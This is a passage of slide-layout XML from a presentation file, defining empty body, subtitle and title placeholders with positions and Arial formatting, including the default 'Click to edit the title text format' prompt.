            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120360" y="3867120"/>
            <a:ext cx="2828520" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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7" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112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0" y="0"/>
            <a:ext cx="9143640" cy="112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9" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112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0" y="0"/>
            <a:ext cx="9143640" cy="112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1" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="5112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0" y="0"/>
            <a:ext cx="9143640" cy="112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0" y="0"/>
            <a:ext cx="9143640" cy="52128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0" y="0"/>
            <a:ext cx="9143640" cy="112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6" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="4286880" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112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0" y="0"/>
            <a:ext cx="9143640" cy="112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0" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="3867120"/>
            <a:ext cx="4286880" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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4" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="8784720" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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8" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="8784720" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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1" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="3867120"/>
            <a:ext cx="4286880" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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6" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="2828520" cy="243828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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3150000" y="1196640"/>
            <a:ext cx="2828520" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120360" y="1196640"/>
            <a:ext cx="2828520" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="2828520" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3150000" y="3867120"/>
            <a:ext cx="2828520" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120360" y="3867120"/>
            <a:ext cx="2828520" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112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0" y="0"/>
            <a:ext cx="9143640" cy="112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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="5112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0" y="0"/>
            <a:ext cx="9143640" cy="11242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0" y="0"/>
            <a:ext cx="9143640" cy="52128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0" y="0"/>
            <a:ext cx="9143640" cy="112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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="4286880" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="3867120"/>
            <a:ext cx="4286880" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="11242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3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="8784720" cy="2438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2040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Click </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>edit </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>title </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>text </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
